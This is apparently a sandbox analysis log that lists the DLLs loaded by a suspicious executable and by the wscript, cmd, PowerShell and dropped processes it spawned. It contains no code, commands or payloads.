Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: version.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: apphelp.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: version.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: wldp.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: profapi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: amsi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: userenv.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: rasman.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: rtutils.dll
